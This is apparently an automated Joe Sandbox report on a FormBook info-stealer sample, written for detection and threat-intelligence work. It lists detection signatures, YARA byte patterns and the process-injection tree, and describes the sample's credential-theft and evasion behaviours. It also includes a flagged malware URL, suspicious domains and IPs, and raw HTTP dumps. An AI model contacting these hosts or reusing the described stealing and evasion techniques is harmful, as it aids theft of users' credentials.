Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
220204-TF1--00.exe

Overview

General Information

Sample name:220204-TF1--00.exe
Analysis ID:1503946
MD5:7054b5f008cd2514db7b7cda8149978a
SHA1:831951c823052e1e2537006e617c29b4f0f864d2
SHA256:c2f4d2c93d321bffcb638ea1c04436cc5d3837af03c9ad2517e7f4d2eebce887
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 220204-TF1--00.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\220204-TF1--00.exe" MD5: 7054B5F008CD2514DB7B7CDA8149978A)
    • svchost.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\220204-TF1--00.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • sXIYDUFnJY.exe (PID: 4908 cmdline: "C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 8032 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • sXIYDUFnJY.exe (PID: 5440 cmdline: "C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6780 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious RASdial Activity
            Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe" , ParentImage: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe, ParentProcessId: 4908, ParentProcessName: sXIYDUFnJY.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 8032, ProcessName: rasdial.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\220204-TF1--00.exe", CommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", ParentImage: C:\Users\user\Desktop\220204-TF1--00.exe, ParentProcessId: 7628, ParentProcessName: 220204-TF1--00.exe, ProcessCommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", ProcessId: 7676, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\220204-TF1--00.exe", CommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", ParentImage: C:\Users\user\Desktop\220204-TF1--00.exe, ParentProcessId: 7628, ParentProcessName: 220204-TF1--00.exe, ProcessCommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", ProcessId: 7676, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.weep.site/v1m8/?56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pTAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: 220204-TF1--00.exeReversingLabs: Detection: 28%
            Source: 220204-TF1--00.exeVirustotal: Detection: 30%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 220204-TF1--00.exeJoe Sandbox ML: detected
            Source: 220204-TF1--00.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXIYDUFnJY.exe, 00000005.00000002.4130102860.0000000000D3E000.00000002.00000001.01000000.00000005.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098859139.0000000000D3E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 220204-TF1--00.exe, 00000000.00000003.1672930052.0000000003730000.00000004.00001000.00020000.00000000.sdmp, 220204-TF1--00.exe, 00000000.00000003.1673498138.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1933247119.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1935399769.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2032919172.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.000000000508E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2035166513.0000000004D4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000002.2032674414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2001240762.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4129769188.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 220204-TF1--00.exe, 00000000.00000003.1672930052.0000000003730000.00000004.00001000.00020000.00000000.sdmp, 220204-TF1--00.exe, 00000000.00000003.1673498138.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2032818323.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1933247119.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1935399769.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.4130949319.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2032919172.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.000000000508E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2035166513.0000000004D4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000002.2032674414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2001240762.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4129769188.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4131381557.000000000551C000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2099009703.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000313EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4131381557.000000000551C000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2099009703.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000313EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_006E4696
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EC93C FindFirstFileW,FindClose,0_2_006EC93C
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006EC9C7
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006EF200
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006EF35D
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006EF65E
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006E3A2B
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006E3D4E
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006EBF27
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F1C420 FindFirstFileW,FindNextFileW,FindClose,6_2_02F1C420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax6_2_02F09B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then pop edi6_2_02F0E109
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h6_2_04CD04DF

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.jaxo.xyz
            Source: Joe Sandbox ViewIP Address: 176.57.64.102 176.57.64.102
            Source: Joe Sandbox ViewIP Address: 167.172.133.32 167.172.133.32
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006F25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_006F25E2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 04 Sep 2024 07:37:10 GMTserver: Apacheset-cookie: __tad=1725435430.3329141; expires=Sat, 02-Sep-2034 07:37:10 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 04 Sep 2024 07:37:12 GMTserver: Apacheset-cookie: __tad=1725435432.1598786; expires=Sat, 02-Sep-2034 07:37:12 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 04 Sep 2024 07:37:15 GMTserver: Apacheset-cookie: __tad=1725435435.2574839; expires=Sat, 02-Sep-2034 07:37:15 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 